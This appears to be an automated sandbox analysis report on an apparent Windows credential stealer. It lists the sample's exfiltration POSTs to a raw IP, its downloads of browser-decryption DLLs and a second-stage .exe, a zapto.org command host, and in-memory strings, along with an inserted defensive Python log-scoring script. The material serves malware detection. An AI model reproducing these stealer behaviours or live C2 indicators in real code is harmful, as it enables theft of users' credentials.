Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 457 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFCGDBAKKKFBGDHJKFHJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 498 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /7847438767.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 198.46.178.145 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: arpdabl.zapto.org | Content-Length: 2673 | Connection: Keep-Alive | Cache-Control: no-cache
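The requests above share a shape that is easy to hunt for in proxy or sandbox logs: multipart/form-data POSTs to a host given as a bare IP, a burst of GETs for the Mozilla NSS libraries (freebl3.dll, mozglue.dll, nss3.dll, softokn3.dll) and their MSVC runtime, which a stealer loads to decrypt Firefox saved logins, and an .exe fetched from a second raw IP. The following is an added example, not part of this report, that re-splits the report's collapsed header lines and scores each Host on those signals. The sample lines are constructed in the same collapsed form (www.example.com is a benign control that is not in the report); the "20 letters from A to K" boundary rule is derived only from the boundaries seen on this page and is treated as a weak signal, not a general fingerprint.

```python
import re
import ipaddress
from collections import defaultdict

# Header names seen in this report's request lines; the sandbox collapsed the
# CRLF between headers, so the parser re-splits on these names.
HEADER_RE = re.compile(
    r"(Content-Type|User-Agent|Host|Content-Length|Connection|Cache-Control): ")
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]")

# Mozilla NSS/NSPR libraries plus the MSVC runtime they depend on; a stealer
# fetches these to call NSS and decrypt Firefox/Thunderbird saved logins.
NSS_DLLS = {"freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll",
            "msvcp140.dll", "vcruntime140.dll"}
# Every boundary in this report is 20 letters drawn from A..K. Assumption:
# a weak, report-derived signal only, not a general Vidar fingerprint.
BOUNDARY_RE = re.compile(r"boundary=----[A-K]{20}$")


def parse_flat_request(line):
    """Parse one collapsed request line into method, path and headers."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rest = line[m.end():]
    hits = list(HEADER_RE.finditer(rest))
    headers = {}
    for i, h in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(rest)
        headers[h.group(1)] = rest[h.end():end].strip()
    return {"method": m["method"], "path": m["path"], "headers": headers}


def is_raw_ip(host):
    """True when the Host header is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def analyse(lines):
    """Return {host: [reasons]} for hosts whose traffic matches the pattern."""
    per_host = defaultdict(lambda: {"posts": 0, "ak": 0, "dlls": set(), "exes": 0})
    for line in lines:
        req = parse_flat_request(line)
        if req is None:
            continue
        host = req["headers"].get("Host", "")
        st = per_host[host]
        ctype = req["headers"].get("Content-Type", "")
        if req["method"] == "POST" and ctype.startswith("multipart/form-data"):
            st["posts"] += 1
            st["ak"] += bool(BOUNDARY_RE.search(ctype))
        elif req["method"] == "GET":
            name = req["path"].rsplit("/", 1)[-1].lower()
            if name in NSS_DLLS:
                st["dlls"].add(name)
            elif name.endswith(".exe"):
                st["exes"] += 1
    findings = {}
    for host, st in per_host.items():
        reasons = []
        if is_raw_ip(host) and st["posts"]:
            reasons.append(f"{st['posts']} multipart POST(s) to raw-IP host")
        if st["ak"]:
            reasons.append(f"{st['ak']} boundary value(s) of 20 letters A-K")
        if len(st["dlls"]) >= 3:
            reasons.append("NSS DLL set downloaded: " + ", ".join(sorted(st["dlls"])))
        if is_raw_ip(host) and st["exes"]:
            reasons.append(f"{st['exes']} .exe download(s) from raw-IP host")
        if reasons:
            findings[host] = reasons
    return findings


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36")


def flat(method, path, host, ctype=None):
    """Build a constructed line in the report's collapsed-header shape."""
    ct = f"Content-Type: {ctype}" if ctype else ""
    return (f"{method} {path} HTTP/1.1{ct}User-Agent: {UA}Host: {host}"
            f"Connection: Keep-AliveCache-Control: no-cache")


# Constructed sample modelled on the requests listed above; www.example.com
# is a benign control that does not appear in the report.
SAMPLE = [
    flat("POST", "/", "5.75.212.60",
         "multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK"),
    flat("GET", "/freebl3.dll", "5.75.212.60"),
    flat("GET", "/mozglue.dll", "5.75.212.60"),
    flat("GET", "/nss3.dll", "5.75.212.60"),
    flat("GET", "/softokn3.dll", "5.75.212.60"),
    flat("GET", "/7847438767.exe", "198.46.178.145"),
    flat("GET", "/profiles/76561199747278259", "steamcommunity.com"),
    flat("GET", "/index.html", "www.example.com"),
]

if __name__ == "__main__":
    for host, reasons in analyse(SAMPLE).items():
        print(host, "->", "; ".join(reasons))
```

Only the raw-IP hosts score; steamcommunity.com is touched by the sample but carries none of the signals, which is the point of scoring per Host rather than per request. The User-Agent is deliberately not used as a signal: the YaBrowser string is a legitimate browser UA and will appear in benign traffic.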
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.212.60 (50 identical events)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00405010
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: arpdabl.zapto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: http://127.0.0.1:8118
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://198.46.178.145/7847438767.exe
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://198.46.178.145/7847438767.exenderbird
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.FBGDHJKFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.KFHJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.org
Source: file.exe, 00000000.00000002.2768054750.000000001B503000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arpdabl.zapto.org/
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.orgJ
Source: file.exe, 00000000.00000002.2761033099.000000000056E000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zaptoJKFHJ
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
